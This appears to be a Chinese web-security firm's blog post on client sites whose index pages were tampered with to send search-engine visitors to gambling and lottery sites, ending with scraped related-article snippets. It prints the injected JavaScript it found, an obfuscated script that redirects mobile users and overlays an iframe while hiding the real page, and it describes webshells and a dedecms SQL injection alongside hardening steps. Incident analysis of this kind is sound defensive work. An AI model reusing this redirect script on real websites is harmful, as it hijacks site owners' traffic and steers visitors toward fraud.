大清早的一上班收到3个网站客户的QQ联系,说是自己公司的网站被跳转到了北京sai车,cai票,du博网站上去了,我们对3个网站进行了详细的安全检测,发现这3个客户的网站都是同样的症状,网站首页文件index.php,index.html都被篡改添加了恶意的代码。网站在百度的快照也被更改成了这些cai票,bo彩的内容了,并被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!

从百度点击网站进去,会直接跳转到bo彩,du博网站上去,直接输入3个公司的网站地址是不会跳转的,点击跳转的时候会被360拦截掉,提示如下图:

360安全中心提醒您:未经证实的bo彩du博网站,您访问的网站含有未经证实的境外bo彩或非法du博的相关内容,可能给您造成财产损失,请您谨慎访问。

我们SINE安全技术通过对3个客户网站的代码的安全分析,发现都被攻击者上传了网站木马后门,php大马,以及一句话木马后门都被上传到了客户网站的根目录下,网站的首页文件都被篡改了,包括网站的标题,描述,TDK都被改成了bo彩,cai票,du博的内容,客户说之前还原了网站首页文件,过不了多久还是被篡改,被跳转,导致客户网站在百度的权重直接降权,网站在百度的关键词排名都掉没了,损失惨重。网站被反复篡改的原因根本是网站代码存在漏洞,需要对网站漏洞进行修复,以及做好网站安全加固,清除木马后门才能彻底的解决问题。

我们来看下网站首页被篡改的症状:

title keywords deion都被篡改了,内容都是加密的字符:

<title>&#65279&#x5317&#x4eac&#36187&#x8f66&#112&#107&#49&#x30&#32&#80&#x4b&#x31&#x30&#24320&#x5956&#x76f4&#25773&#x20&#21271&#20140&#x8d5b&#36710&#112&#x6b&#49&#x30&#24320&#22870&#x8bb0&#24405&#45&#112&#107&#x31&#x30&#x5f00&#22870&#35270&#39057&#30452&#25773</title>

通过url解密发现这些内容都是北京sai车,北京pk10,pk10北京PK开奖等cai票的网站关键词,简单来讲就是网站的标题内容都被攻击者改成了cai票,bo彩的标题,利用网站自身在百度的权重,做他们自己的关键词排名。

网站被跳转的代码也被我们找了出来,如下:

function goPAGE() {if((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "rgyh2"} else {var ss = '<center id="yangchen"><ifr' + 'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14' + '00" height="8' + '50" src="att=rgyh8"></iframe></center>'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id;if (myid != "iconDiv1" && myid != "yangchen") {document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100)} catch (e) {}}}goPAGE();

知道问题的所在,以及网站被攻击的症状,那么该如何解决问题?

首先登陆客户网站的服务器,打包压缩客户的网站代码下载到我们本地的工作电脑,对其进行详细的安全检测,以及网站漏洞检测,网站木马后门检测,以及网站日志下载分析,发现其中一个网站使用的是dedecms系统开发网站,网站存在sql注入漏洞,导致网站的管理员账号密码被sql注入获取到,默认的管理员后台地址dede没有改,导致攻击者直接登录后台上传了木马到网站里了。针对dedecms的sql注入漏洞进行了修复,清除掉网站存在的木马后门,对网站安全进行加固问题得以解决。

对dedecms的目录安全权限进行设置 /data目录取消脚本执行权限,给与写入权限,templets模板文件夹也是同样的安全部署,取消php脚本的执行权限,开启写入权限,dede后台的目录给只读权限,uploads上传目录给写入,取消php脚本权限。

至此客户网站首页被篡改的问题得以解决,百度的拦截也是需要去除的,清除恶意链接代码,修复网站漏洞,防止以后网站被篡改,做好网站安全后,再提交给百度安全中心人工审核,就可以解除百度的拦截,如果您对网站漏洞修复不熟悉的话,可以找我们向网站安全公司修复网站漏洞,解决百度拦截。

网站被黑提醒该站点可能受到黑客攻击,部分页面已被非法篡改相关推荐

  1. 当你的网站被百度定义为“风险“ “百度网址安全中心提醒您:该页面可能已被非法篡改!“

    前言 经过苦苦的48小时,持续竭力地和百度官方沟通.终于把我网"风险" "百度网址安全中心提醒您:该页面可能已被非法篡改!"字眼出掉.真心不容易.因此写下这篇博 ...

  2. 百度快照被劫持百度网址安全中心提醒您:该页面可能已被非法篡改

    近期受世界杯的影响,很多中小企业网站频繁的被黑客入侵篡改了快照内容的网站安全问题导致打开网站被提示博彩页面,在搜索引擎中会被提示百度网址安全中心提醒您:该页面可能已被非法篡改! 主要客户网站问题基本都 ...

  3. 盖茨、奥巴马、马斯克账号被黑,推特遭大规模黑客攻击

    据外媒报道,推特(Twitter)遭遇"史诗级"大规模黑客攻击,比尔·盖茨.马斯克.奥巴马.贝索斯.苹果公司等账号集体被黑,他们的账号均发布了相同的诈骗信息,让大家在接下来的30分 ...

  4. CTO 写的低级 Bug 再致网站被黑,CEO 的号都被盗了!

    ‍‍ 整理 | 郑丽媛 出品 | CSDN(ID:CSDNnews) 上周,美国开源社交网络服务平台 Gab ,因其 CTO 写的低级 Bug 受到黑客攻击,导致约 70GB 的数据被窃取. 可该公司 ...

  5. 怎么看网站是否被黑防止网站被黑

    网站被黑,打开网站竟然跳转到博cai网站上去了,一开始以为自己看错了,多次从百度点击自己网站进去,还是会跳转到彩piao网站上,第一反应是自己的网站被黑了,经营网站很多年了,从来未遇到过这种情况. 先 ...

  6. 网站被黑了被挂马篡改后,如何解决网站被挂马?

    文章目录 网站被黑了.被挂马.被篡改后,自己如何解决网站被挂马? 示例: 方法一 一. 发现被黑,网站被黑的症状 二.自己猜想了一下原因,页面和百度抓取收录显示不一致.查服务器日志方案不可行. 三.找 ...

  7. 我的网站被黑了,关键词被劫持,总结一下是怎么解决的。

    1.发现被黑,网站被黑的症状 两年前自己用wordpress搭了一个网站,平时没事写写文章玩玩.但是前些日子,突然发现网站的流量突然变小,site了一下百度收录,发现出了大问题,网站被黑了.大多数百度 ...

  8. 如何防止网站被黑客入侵,避免网站被黑的防御方法

    如果客户的企业网站被攻击了怎么办,因为做网站建设的朋友或者在维护网站的朋友都应该知道,有很多企业网站会经常被植入木马或是被黑客攻击,造成我们的网站打不开,或是打开后进入的不是我们公司自己的网站,而是链 ...

  9. 企业网站被黑客攻击了怎么办

    如果客户的企业网站被攻击了怎么办,因为做网站建设的朋友或者在维护网站的朋友都应该知道,有很多企业网站会经常被植入木马或是被黑客攻击,造成我们的网站打不开,或是打开后进入的不是我们公司自己的网站,而是链 ...

  10. 网站被黑有什么影响?为什么网站被黑了?如何防止网站被黑?

    如果一个网站被黑了,就意味着该网站存在很多安全隐患和漏洞.即使你登录服务器找到源文件进行修复,仍然会面临再次被黑的风险.只有发现并修复网站漏洞,才能避免重蹈覆辙,有效防止黑客攻击. 网站被黑客入侵有什 ...

最新文章

  1. 深度学习与TensorFlow
  2. 157所中国内地高校上榜!最新世界大学学术排名发布
  3. iOS推送兼容iOS7
  4. 阿里云飞天论文获国际架构顶会 ATC 2021最佳论文:全球仅三篇
  5. C#中的集合学习笔记
  6. linux卸载db2cli,DB2 for linux 安装
  7. 数据库运维:检查不同数据库中表的差异方案
  8. 查看linux的计划任务日志,查看计划任务日志(共5篇).docx
  9. Kali渗透测试——利用metasploit攻击靶机WinXP SP1
  10. BestCoder Round #66 (div.2) 1002
  11. mysql char(36)_MySQL中char(36)被认为是GUID导致的BUG及解决方案
  12. shouldoverrideurlloading为什么有时候不走_为什么付出越多,对方就越不懂得感恩,婚姻有时候也需要斤斤计较...
  13. IDA远程调试Android
  14. matlab实现单峰物体复原--光栅投影-多频外差
  15. WIN10作为服务器操作系统可以吗,服务器可以装win10吗
  16. linux下ptp性能测试
  17. 【ESP 保姆级教程】疯狂传感器篇 —— 案例:ESP8266 + MQ3酒精传感器 + webserver(局域网内曲线变化图)+ 自定义飞书告警
  18. Java基础语法-数据类型与idea配置
  19. [渝粤教育] 西南科技大学 财务管理与分析 在线考试复习资料(2)
  20. 企业绿色创新转型-2002-2020工业企业科技创新指标汇总

热门文章

  1. 【Web前端】笔试题含解析
  2. 百度api翻译html,帮助文档首页
  3. 【任玉刚】给Android程序员的一些面试建议
  4. mantelhean.test r语言_Meta分析常用教程:R语言
  5. FDDB人脸库评价人脸检测模型超详细步骤
  6. python:实现希尔密码算法(附完整源码)
  7. swfobject.js 简介
  8. 【无人机】一文读懂无人机飞行原理
  9. c#如何在FTP服务器上下载文件夹及子文件夹中的文件
  10. Kotlin | Kotlin教程